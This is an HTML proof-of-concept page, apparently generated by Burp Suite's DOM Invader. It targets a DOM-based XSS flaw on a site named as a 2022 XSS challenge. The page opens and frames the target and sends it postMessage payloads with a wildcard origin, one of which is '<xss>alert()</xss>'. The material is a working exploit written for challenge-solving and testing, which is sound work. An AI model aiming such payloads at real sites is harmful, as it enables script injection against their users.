
        <!doctype html>
        <html>
            <head>
                <!-- DOM XSS PoC - generated by DOM Invader part of Burp Suite -->
                <meta charset="UTF-8" />
                <title>Postmessage PoC</title>
                <script>
                    function pocLink() {
                        let win = window.open('https://august-2022-bc-xss-challenge.herokuapp.com/frame.php');
                        let msg = "<xss>alert()</xss>";

                        setTimeout(function(){
                            win.postMessage(msg, '*');
                        }, 5000);
                    }
                    function pocFrame(win) {
                        let msg = "adminmofeed0-";

                        win.postMessage(msg, '*');
                    }
                </script>
            </head>
            <body>
                <a href="#" onclick="pocLink();">PoC link</a>
                <iframe src="https://august-2022-bc-xss-challenge.herokuapp.com/frame.php" onload="pocFrame(this.contentWindow)"></iframe>
            </body>
        </html>
